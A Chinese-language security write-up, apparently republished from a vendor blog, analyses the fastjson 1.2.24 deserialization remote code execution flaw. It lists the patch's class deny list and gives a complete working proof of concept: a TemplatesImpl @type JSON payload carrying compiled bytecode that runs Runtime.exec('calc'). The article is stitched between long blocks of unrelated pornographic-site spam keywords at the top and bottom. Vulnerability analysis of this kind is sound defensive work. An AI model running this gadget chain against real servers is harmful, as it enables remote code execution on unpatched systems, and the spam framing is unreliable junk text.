精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Fastjson遠(yuǎn)程反序列化程序驗(yàn)證的構(gòu)造和分析

安全 漏洞
fastjson官方主動(dòng)爆出fastjson在1.2.24及之前版本存在遠(yuǎn)程代碼執(zhí)行高危安全漏洞。攻擊者可以通過(guò)此漏洞遠(yuǎn)程執(zhí)行惡意代碼來(lái)入侵服務(wù)器。

fastjson是一個(gè)java編寫的高性能功能非常完善的JSON庫(kù),應(yīng)用范圍非常廣,在github上star數(shù)都超過(guò)8k,在2017年3月15日,fastjson官方主動(dòng)爆出fastjson在1.2.24及之前版本存在遠(yuǎn)程代碼執(zhí)行高危安全漏洞。攻擊者可以通過(guò)此漏洞遠(yuǎn)程執(zhí)行惡意代碼來(lái)入侵服務(wù)器。

關(guān)于漏洞的具體詳情可參考 :https://github.com/alibaba/fastjson/wiki/security_update_20170315

受影響的版本

  1. fastjson <= 1.2.24 

靜態(tài)分析

根據(jù)官方給出的補(bǔ)丁文件,主要的更新在這個(gè)checkAutoType函數(shù)上,而這個(gè)函數(shù)的主要功能就是添加了黑名單,將一些常用的反序列化利用庫(kù)都添加到黑名單中。

具體包括:

  1. bsh,com.mchange,com.sun.,java.lang.Thread,java.net.Socket,java.rmi,javax.xml,org.apache.bcel,org.apache.commons.beanutils, 
  2. org.apache.commons.collections.Transformer,org.apache.commons.collections.functors,org.apache.commons.collections4. 
  3. comparators,org.apache.commons.fileupload,org.apache.myfaces.context.servlet,org.apache.tomcat,org.apache.wicket.util, 
  4. org.codehaus.groovy.runtime,org.hibernate,org.jboss,org.mozilla.javascript,org.python.core,org.springframework 

下面我們來(lái)分析checkAutoType的函數(shù)實(shí)現(xiàn):

  1. if (typeName == null) { 
  2.             return null
  3.         } 
  4.   
  5.         if (typeName.length() >= maxTypeNameLength) { 
  6.             throw new JSONException("autoType is not support. " + typeName); 
  7.         } 
  8.   
  9.         final String className = typeName.replace('$''.'); 
  10.   
  11.         if (autoTypeSupport || expectClass != null) { 
  12.             for (int i = 0; i < acceptList.length; ++i) { 
  13.                 String accept = acceptList[i]; 
  14.                 if (className.startsWith(accept)) { 
  15.                     return TypeUtils.loadClass(typeName, defaultClassLoader); 
  16.                 } 
  17.             } 
  18.   
  19.             for (int i = 0; i < denyList.length; ++i) { 
  20.                 String deny = denyList[i]; 
  21.                 if (className.startsWith(deny)) { 
  22.                     throw new JSONException("autoType is not support. " + typeName); 
  23.                 } 
  24.             } 
  25.         } 
  26.   
  27.         Class<?> clazz = TypeUtils.getClassFromMapping(typeName); 
  28.         if (clazz == null) { 
  29.             clazz = deserializers.findClass(typeName); 
  30.         } 
  31.   
  32.         if (clazz != null) { 
  33.             if (expectClass != null && !expectClass.isAssignableFrom(clazz)) { 
  34.                 throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName()); 
  35.             } 
  36.   
  37.             return clazz; 
  38.         } 

核心部分就是denyList的處理過(guò)程,遍歷denyList,如果引入的庫(kù)以denyList中某個(gè)deny打頭,就會(huì)拋出異常,中斷運(yùn)行。

程序驗(yàn)證構(gòu)造

靜態(tài)分析得知,要構(gòu)造一個(gè)可用的程序,肯定得引入denyList的庫(kù)。剛開始fastjson官方公布漏洞信息時(shí),當(dāng)時(shí)就嘗試構(gòu)造驗(yàn)證程序,怎奈fastjson的代碼確實(shí)龐大,還有asm機(jī)制,通過(guò)asm機(jī)制生成的臨時(shí)代碼下不了斷點(diǎn)。當(dāng)時(shí)也只能通過(guò)在通過(guò)類初始化的時(shí)候彈出一個(gè)計(jì)算器,很顯然這個(gè)構(gòu)造方式不具有通用性,最近jackson爆出反序列漏洞,其中就利用了TemplatesImpl類,而這個(gè)類有一個(gè)字段就是_bytecodes,有部分函數(shù)會(huì)根據(jù)這個(gè)_bytecodes生成java實(shí)例,簡(jiǎn)直不能再更妙,這就解決了fastjson通過(guò)字段傳入一個(gè)類,再通過(guò)這個(gè)類執(zhí)行有害代碼。后來(lái)閱讀ysoserial的代碼時(shí)也發(fā)現(xiàn)在gadgets.java這個(gè)文件中也使用到了這個(gè)類來(lái)動(dòng)態(tài)生成可執(zhí)行命令的代碼。

下面是一個(gè)程序驗(yàn)證的代碼:

  1. import com.sun.org.apache.xalan.internal.xsltc.DOM; 
  2. import com.sun.org.apache.xalan.internal.xsltc.TransletException; 
  3. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 
  4. import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; 
  5. import com.sun.org.apache.xml.internal.serializer.SerializationHandler; 
  6.   
  7. import java.io.IOException; 
  8.   
  9. public class Test extends AbstractTranslet { 
  10.     public Test() throws IOException { 
  11.         Runtime.getRuntime().exec("calc"); 
  12.     } 
  13.   
  14.     @Override 
  15.     public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) { 
  16.     } 
  17.   
  18.     @Override 
  19.     public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws TransletException { 
  20.   
  21.     } 
  22.   
  23.     public static void main(String[] args) throws Exception { 
  24.         Test t = new Test(); 
  25.     } 

這個(gè)是Test.java的實(shí)現(xiàn),在Test.java的構(gòu)造函數(shù)中執(zhí)行了一條命令,彈出計(jì)算器。編譯Test.java得到Test.class供后續(xù)使用。后續(xù)會(huì)將Test.class的內(nèi)容賦值給_bytecodes。讓我們接著分析:

  1. package person; 
  2.   
  3. import com.alibaba.fastjson.JSON; 
  4. import com.alibaba.fastjson.parser.Feature; 
  5. import com.alibaba.fastjson.parser.ParserConfig; 
  6. import org.apache.commons.io.IOUtils; 
  7. import org.apache.commons.codec.binary.Base64; 
  8.   
  9. import java.io.ByteArrayOutputStream; 
  10. import java.io.File; 
  11. import java.io.FileInputStream; 
  12. import java.io.IOException; 
  13.   
  14. /** 
  15.  * Created by web on 2017/4/29. 
  16.  */ 
  17. public class P{ 
  18.   
  19.     public static String readClass(String cls){ 
  20.         ByteArrayOutputStream bos = new ByteArrayOutputStream(); 
  21.         try { 
  22.             IOUtils.copy(new FileInputStream(new File(cls)), bos); 
  23.         } catch (IOException e) { 
  24.             e.printStackTrace(); 
  25.         } 
  26.         return Base64.encodeBase64String(bos.toByteArray()); 
  27.   
  28.     } 
  29.   
  30.     public static void  test_autoTypeDeny() throws Exception { 
  31.         ParserConfig config = new ParserConfig(); 
  32.         final String fileSeparator = System.getProperty("file.separator"); 
  33.         final String evilClassPath = System.getProperty("user.dir") + "\\target\\classes\\person\\Test.class"
  34.         String evilCode = readClass(evilClassPath); 
  35.         final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"
  36.         String text1 = "{\"@type\":\"" + NASTY_CLASS + 
  37.                 "\",\"_bytecodes\":[\""+evilCode+"\"],'_name':'a.b',\"_outputProperties\":{ }," + 
  38.                 "\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n"
  39.         System.out.println(text1); 
  40.         
  41.         Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField); 
  42.         //assertEquals(Model.class, obj.getClass()); 
  43.     } 
  44.     public static void main(String args[]){ 
  45.         try { 
  46.             test_autoTypeDeny(); 
  47.         } catch (Exception e) { 
  48.             e.printStackTrace(); 
  49.         } 
  50.     } 

在這個(gè)程序驗(yàn)證代碼中,最核心的部分是_bytecodes,它是要執(zhí)行的代碼,@type是指定的解析類,fastjson會(huì)根據(jù)指定類去反序列化得到該類的實(shí)例,在默認(rèn)情況下,fastjson只會(huì)反序列化公開的屬性和域,而com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl中_bytecodes卻是私有屬性,_name也是私有域,所以在parseObject的時(shí)候需要設(shè)置Feature.SupportNonPublicField,這樣_bytecodes字段才會(huì)被反序列化。_tfactory這個(gè)字段在TemplatesImpl既沒(méi)有g(shù)et方法也沒(méi)有set方法,所以是設(shè)置不了的,彈計(jì)算器的圖中展示了但是實(shí)際運(yùn)行卻沒(méi)有使用,只能依賴于jdk的實(shí)現(xiàn),作者在1.8.0_25,1.7.0_05測(cè)試都能彈出計(jì)算器,某些版本中在defineTransletClasses()用到會(huì)引用_tfactory屬性導(dǎo)致異常退出。

接下來(lái)我們看下TemplatesImpl.java的幾個(gè)關(guān)鍵函數(shù):

  1. public synchronized Properties getOutputProperties() { 
  2.         try { 
  3.             return newTransformer().getOutputProperties(); 
  4.         } 
  5.         catch (TransformerConfigurationException e) { 
  6.             return null
  7.         } 
  8.     } 
  1. public synchronized Transformer newTransformer() 
  2.         throws TransformerConfigurationException 
  3.     { 
  4.         TransformerImpl transformer; 
  5.   
  6.         transformer = new TransformerImpl(getTransletInstance(), _outputProperties, 
  7.             _indentNumber, _tfactory); 
  8.   
  9.         if (_uriResolver != null) { 
  10.             transformer.setURIResolver(_uriResolver); 
  11.         } 
  12.   
  13.         if (_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)) { 
  14.             transformer.setSecureProcessing(true); 
  15.         } 
  16.         return transformer; 
  17.     } 
  1. private Translet getTransletInstance() 
  2.         throws TransformerConfigurationException { 
  3.         try { 
  4.             if (_name == nullreturn null
  5.   
  6.             if (_class == null) defineTransletClasses(); 
  7.   
  8.             // The translet needs to keep a reference to all its auxiliary 
  9.             // class to prevent the GC from collecting them 
  10.             AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance(); 
  11.             translet.postInitialization(); 
  12.             translet.setTemplates(this); 
  13.             translet.setServicesMechnism(_useServicesMechanism); 
  14.             if (_auxClasses != null) { 
  15.                 translet.setAuxiliaryClasses(_auxClasses); 
  16.             } 
  17.   
  18.             return translet; 
  19.         } 
  20.         catch (InstantiationException e) { 
  21.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name); 
  22.             throw new TransformerConfigurationException(err.toString()); 
  23.         } 
  24.         catch (IllegalAccessException e) { 
  25.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name); 
  26.             throw new TransformerConfigurationException(err.toString()); 
  27.         } 
  28.     } 
  1. private void defineTransletClasses() 
  2.         throws TransformerConfigurationException { 
  3.   
  4.         if (_bytecodes == null) { 
  5.             ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR); 
  6.             throw new TransformerConfigurationException(err.toString()); 
  7.         } 
  8.   
  9.         TransletClassLoader loader = (TransletClassLoader) 
  10.             AccessController.doPrivileged(new PrivilegedAction() { 
  11.                 public Object run() { 
  12.                     return new TransletClassLoader(ObjectFactory.findClassLoader()); 
  13.                 } 
  14.             }); 
  15.   
  16.         try { 
  17.             final int classCount = _bytecodes.length; 
  18.             _class = new Class[classCount]; 
  19.   
  20.             if (classCount > 1) { 
  21.                 _auxClasses = new Hashtable(); 
  22.             } 
  23.   
  24.             for (int i = 0; i < classCount; i++) { 
  25.                 _class[i] = loader.defineClass(_bytecodes[i]); 
  26.                 final Class superClass = _class[i].getSuperclass(); 
  27.   
  28.                 // Check if this is the main class 
  29.                 if (superClass.getName().equals(ABSTRACT_TRANSLET)) { 
  30.                     _transletIndex = i; 
  31.                 } 
  32.                 else { 
  33.                     _auxClasses.put(_class[i].getName(), _class[i]); 
  34.                 } 
  35.             } 
  36.   
  37.             if (_transletIndex < 0) { 
  38.                 ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name); 
  39.                 throw new TransformerConfigurationException(err.toString()); 
  40.             } 
  41.         } 
  42.         catch (ClassFormatError e) { 
  43.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name); 
  44.             throw new TransformerConfigurationException(err.toString()); 
  45.         } 
  46.         catch (LinkageError e) { 
  47.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name); 
  48.             throw new TransformerConfigurationException(err.toString()); 
  49.         } 
  50.     } 

在getTransletInstance調(diào)用defineTransletClasses,在defineTransletClasses方法中會(huì)根據(jù)_bytecodes來(lái)生成一個(gè)java類,生成的java類隨后會(huì)被getTransletInstance方法用到生成一個(gè)實(shí)例,也也就到了最終的執(zhí)行命令的位置Runtime.getRuntime.exec()

下面我們上一張調(diào)用鏈的圖:

 

簡(jiǎn)單來(lái)說(shuō)就是:

  1. JSON.parseObject 
  2. ... 
  3. JavaBeanDeserializer.deserialze 
  4. ... 
  5. FieldDeserializer.setValue 
  6. ... 
  7. TemplatesImpl.getOutputProperties 
  8. TemplatesImpl.newTransformer 
  9. TemplatesImpl.getTransletInstance 
  10. ... 
  11. Runtime.getRuntime().exec 

附上一張成功執(zhí)行圖:

總結(jié)

該程序驗(yàn)證的影響jdk 1.7,1.8版本,1.6未測(cè)試,但是需要在parseObject的時(shí)候設(shè)置Feature.SupportNonPublicField。

責(zé)任編輯:武曉燕 來(lái)源: 綠盟科技博客
相關(guān)推薦

2011-06-01 15:05:02

序列化反序列化

2011-05-18 15:20:13

XML

2009-08-24 17:14:08

C#序列化

2009-06-14 22:01:27

Java對(duì)象序列化反序列化

2022-08-06 08:41:18

序列化反序列化Hessian

2009-08-06 11:16:25

C#序列化和反序列化

2009-08-25 14:24:36

C#序列化和反序列化

2019-11-20 10:07:23

web安全PHP序列化反序列化

2018-03-19 10:20:23

Java序列化反序列化

2009-09-09 15:47:27

XML序列化和反序列化

2009-09-09 14:45:41

XML序列化和反序列化

2009-07-29 13:39:02

JSON序列化和反序列ASP.NET AJA

2010-03-19 15:54:21

Java Socket

2021-11-18 07:39:41

Json 序列化Vue

2009-09-09 16:10:11

.NET序列化和反序列

2009-08-25 14:43:26

C#序列化和反序列化

2023-12-13 13:49:52

Python序列化模塊

2023-12-26 07:26:07

Java序列化反序列化機(jī)制

2012-04-13 10:45:59

XML

2011-06-01 14:50:48

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

韩国三级丰满少妇高潮| 超碰国产精品久久国产精品99| 色呦呦一区二区| heyzo高清中文字幕在线| 日本三级亚洲精品| 在线观看精品国产视频| 五月婷婷激情久久| 青青青青在线| 久久精品国产在热久久| 久久精品久久久久久国产 免费| 亚洲综合激情视频| www在线观看播放免费视频日本| 国产一区二区在线视频| 免费成人高清视频| www.男人天堂| 无遮挡爽大片在线观看视频| 久久亚洲二区三区| 国产区精品在线观看| 三级影片在线看| jazzjazz国产精品久久| 亚洲va欧美va国产va天堂影院| 极品尤物一区二区三区| 亚洲欧美一区二区三区在线观看| 国产中文精品久高清在线不| 欧美日韩在线三级| 老司机午夜免费福利视频| 亚洲AV无码精品自拍| 日韩视频二区| 亚洲性无码av在线| 三级黄色片播放| eeuss鲁一区二区三区| 狠狠色丁香久久婷婷综合丁香| 欧美国产第二页| 中文成人无字幕乱码精品区| 久久91导航| 最新久久zyz资源站| 91精品国产综合久久久久久丝袜| 懂色av.com| 成人激情电影在线| 欧美精品一级二级| 久久久久久久久久网| 精品一二三区视频| 国产精品一区二区视频| 日韩免费在线视频| 中文字幕手机在线观看| 亚洲人和日本人hd| 欧美一卡二卡在线| 爆乳熟妇一区二区三区霸乳| 羞羞网站在线免费观看| 国产日韩影视精品| 国产精品12| 一区二区三区麻豆| 99精品福利视频| 最近的2019中文字幕免费一页| 黄色国产在线视频| 日韩毛片网站| 欧美色xxxx| 老司机午夜免费福利视频| 成年人在线看| 精品一区二区三区在线视频| 欧美一区二区三区四区在线| 青娱乐av在线| 色综合色综合| 亚洲女同性videos| 免费黄色三级网站| 久久久久久爱| 欧美日韩亚洲网| 800av在线免费观看| 日本最黄一级片免费在线| 91麻豆成人久久精品二区三区| 91免费版网站在线观看| 亚洲一卡二卡在线观看| 日韩中文字幕不卡| 26uuu另类亚洲欧美日本老年| 亚洲欧美精品aaaaaa片| 精品国产网站| 亚洲精品一区二区久| 日本少妇xxxx| 国产三级精品三级在线观看国产| 欧美理论电影在线| 国产主播中文字幕| 欧美无毛视频| 欧美日韩国产精品一区二区三区四区 | 国产精品日韩精品欧美精品| 久久综合久久美利坚合众国| 国产精品白嫩白嫩大学美女| 欧美日韩免费观看一区=区三区| 欧美精品制服第一页| 青青草激情视频| 国产综合自拍| 2019av中文字幕| 欧美a视频在线观看| 奇米精品一区二区三区在线观看 | 欧美三级在线看| 国产乱码一区二区三区四区| 香蕉大人久久国产成人av| 精品成人一区二区三区| 黄瓜视频污在线观看| 日韩毛片视频| 欧美激情日韩图片| 亚洲 欧美 日韩 在线| 久久精品久久久精品美女| 91在线在线观看| 亚洲欧洲国产综合| 国产精品久99| www精品久久| 精品成人av| 日韩午夜激情视频| 国产精品1000部啪视频| 97精品国产一区二区三区| 欧美精品久久久久久久| 99久久精品国产亚洲| 精品中文字幕一区二区小辣椒| 超碰97在线人人| 成人激情电影在线看| 亚洲自拍与偷拍| 免费在线观看毛片网站| 欧美特黄不卡| 亚洲人午夜色婷婷| 国产一级片播放| 日韩av在线播放中文字幕| 北条麻妃高清一区| av成人手机在线| 亚洲午夜激情av| 黄色一级片免费的| 伊人久久大香线蕉综合网蜜芽| 久热精品视频在线观看| 亚洲精品一区二三区| 成人国产免费视频| 日本黄色a视频| 成人性生交大片免费观看网站| 日韩三级在线观看| 性少妇xx生活| 老鸭窝91久久精品色噜噜导演| 91午夜在线播放| 国产色在线 com| 亚洲成人av在线电影| 手机在线视频一区| 欧美三级三级| 欧美一级免费看| 亚洲第九十九页| 亚洲欧洲精品天堂一级| 青青在线视频免费| 日韩在线你懂的| 久久天天躁狠狠躁夜夜爽蜜月| 日本三级一区二区三区| 久久夜色精品国产欧美乱极品| 欧美一区二区视频在线播放| 热久久久久久| 一区二区在线免费视频| 久久久久久少妇| av不卡一区二区三区| 欧美性潮喷xxxxx免费视频看| 白嫩亚洲一区二区三区| 久久精品国产一区二区三区| 在线观看日批视频| 国产欧美日本一区视频| 白嫩少妇丰满一区二区| 蜜桃tv一区二区三区| 欧美孕妇毛茸茸xxxx| 无码精品在线观看| 精品人伦一区二区三区蜜桃网站| 一级欧美一级日韩片| 在线国产欧美| 国语精品免费视频| 精精国产xxx在线视频app| 亚洲成人黄色在线| 日韩大片免费在线观看| 91丝袜美腿高跟国产极品老师| 欧美不卡在线播放| 欧美做受69| 日本欧美黄网站| 久青草国产在线| 日本丰满少妇一区二区三区| 国产一级久久久久毛片精品| 日本欧美韩国一区三区| 亚洲一区二区三区免费看| 色综合视频一区二区三区日韩| 久久精品国产99国产精品澳门| 国产乱淫片视频| 亚洲精品国产无套在线观| 韩国三级与黑人| 亚洲激情av| 欧美久久综合性欧美| 成人精品一区二区三区电影| 久久精品免费播放| 六月婷婷中文字幕| 欧美日韩国产麻豆| 国产美女永久免费无遮挡| 精东粉嫩av免费一区二区三区| 色哟哟免费网站| 乱亲女h秽乱长久久久| 国产精品国产自产拍高清av水多| av网站在线免费播放| 91.麻豆视频| 成年人午夜视频| 国产欧美日韩综合精品一区二区| 在线一区二区不卡| 日韩一级在线| 亚洲视频精品一区| 白白在线精品| 日韩美女福利视频| 老司机在线永久免费观看| 日韩欧美激情四射| 精品国产乱子伦| 亚洲视频一区二区免费在线观看| 无码人妻一区二区三区免费n鬼沢| 夜久久久久久| 少妇精品久久久久久久久久| 免费观看亚洲视频大全| 国产91av在线| a视频在线观看免费| 亚洲精品视频网上网址在线观看| 97人妻一区二区精品免费视频 | 2019最新中文字幕| 麻豆传媒在线完整视频| 日韩av在线免费| 亚洲一区中文字幕永久在线| 亚洲国产aⅴ成人精品无吗| 黄色片网站免费| www.日韩精品| 成人黄色一级大片| 日韩一级大片| 女女同性女同一区二区三区按摩| 要久久爱电视剧全集完整观看| 91久久极品少妇xxxxⅹ软件| 电影一区电影二区| 97国产精品久久| 黄色网在线播放| 亚洲精品视频中文字幕| 免费观看黄色av| 91麻豆精品国产91| 中国a一片一级一片| 图片区小说区国产精品视频| 艳妇荡乳欲伦69影片| 国产日韩欧美综合一区| 中文乱码人妻一区二区三区视频| 国产一区视频网站| 亚洲精品久久久中文字幕| 亚洲精品乱码久久久久久蜜桃麻豆| 伊人情人网综合| jiujiure精品视频播放| 欧美极品色图| 色婷婷狠狠五月综合天色拍| 国产精品美女久久久久av福利| 综合久久av| 国产精自产拍久久久久久| 偷拍中文亚洲欧美动漫| 热re91久久精品国99热蜜臀| 黄网站在线观| 欧美精品亚州精品| 好了av在线| 日韩三级成人av网| 91大神在线网站| 一区二区三区www| 黑人与亚洲人色ⅹvideos| 国产视频综合在线| 欧美日本韩国一区二区| 精品亚洲永久免费精品| 三区在线视频| 亚洲美女视频网| 欧美新色视频| 亚洲欧美日韩天堂| 国产九色在线| 夜夜嗨av一区二区三区四区| av影片免费在线观看| 色婷婷综合久久久久中文字幕1| 高清国产福利在线观看| 国产性色av一区二区| 91在线播放网站| 精品国产一区二区三区久久狼黑人| 五月天婷婷在线视频| 久久精品国产视频| 在线观看小视频| 欧美激情videoshd| 嗯~啊~轻一点视频日本在线观看| 午夜精品久久久99热福利| а√天堂中文资源在线bt| 8050国产精品久久久久久| 中文不卡1区2区3区| 国产精品99久久久久久白浆小说| 日韩欧美精品一区二区综合视频| 国产欧美日韩丝袜精品一区| 国产精品成人**免费视频| 97超碰资源| 欧美天堂影院| 日韩久久久久久久| 一区二区三区四区在线观看国产日韩| 成人在线视频一区二区三区| 国产精品腿扒开做爽爽爽挤奶网站| 国产成人a亚洲精v品无码| 日本在线观看不卡视频| aaa一级黄色片| www.一区二区| 久久久精品成人| 亚洲日本电影在线| 九一国产在线观看| 欧美老肥妇做.爰bbww| 亚洲成熟女性毛茸茸| 亚洲人成网站777色婷婷| 成人福利网站| 琪琪第一精品导航| 亚洲狼人在线| 久久综合狠狠综合久久综青草| 成人亚洲一区| 男人天堂av片| 美国十次了思思久久精品导航| 色诱av手机版| 久久精品水蜜桃av综合天堂| 亚洲天堂黄色片| 欧美视频国产精品| 国产片高清在线观看| 日韩激情视频在线| 欧美另类极品| 2019av中文字幕| 国产一区二区av在线| 麻豆成人av| 自拍视频亚洲| 最新中文字幕免费视频| 成人综合婷婷国产精品久久蜜臀 | 免费人成在线不卡| 精品国产av色一区二区深夜久久 | 国产青青草在线| 欧美激情一级欧美精品| 99久久er| 精品国产乱码一区二区三区四区 | 黄色小说综合网站| 深爱五月激情网| 亚洲一区二区三区视频在线| 在线免费av片| 亚洲欧美国产va在线影院| 日本在线视频中文有码| 成人黄色av网| 欧美日韩在线二区| 成人一级片网站| 99久久精品免费| 久久老司机精品视频| 在线播放中文字幕一区| 成年人在线观看| 日本午夜在线亚洲.国产| eeuss鲁片一区二区三区| 免费看污污视频| 久久成人18免费观看| 国产一区二区三区精品在线| 欧美视频在线免费| 熟妇人妻系列aⅴ无码专区友真希| 日韩视频免费看| 国产成人毛片| 日韩免费电影一区二区三区| 免费欧美在线| 国产精品久久久免费观看| 亚洲国产视频网站| 国产 欧美 精品| 欧美精品激情在线| 激情小说一区| 岛国大片在线播放| 不卡一区二区三区四区| 国产精品变态另类虐交| 精品日韩av一区二区| 白白色在线观看| 国产乱码一区| 亚洲人成高清| 精品人妻一区二区三区香蕉| 天天综合色天天综合色h| 天堂中文在线看| 欧美一区二区三区精品电影| 久久不见久久见中文字幕免费| 国产欧美在线一区| 久久嫩草精品久久久精品| www.久久网| 久久精品国产欧美亚洲人人爽| 亚洲最大的免费视频网站| 天堂av在线中文| 国产91丝袜在线播放0| 日韩精品一区二区在线播放| 日韩精品免费电影| 成人国产一区| 国产91av视频在线观看| 国产精品一卡二| 日韩少妇高潮抽搐| 亚洲一区二区福利| 精品美女一区| 大片在线观看网站免费收看| 成人深夜在线观看| 区一区二在线观看| 精品国产视频在线| 一区中文字幕电影| 国产又大又硬又粗| 国产精品国产精品国产专区不片| 国产精品国产一区二区三区四区| 欧美另类极品videosbest最新版本 | 国产手机视频在线观看| 粉嫩一区二区三区在线看| 日韩人妻精品中文字幕| 日韩在线精品一区| 高潮久久久久久久久久久久久久| 欧美日韩第二页| 亚洲少妇中出一区| 三区在线观看| 成人黄色在线播放|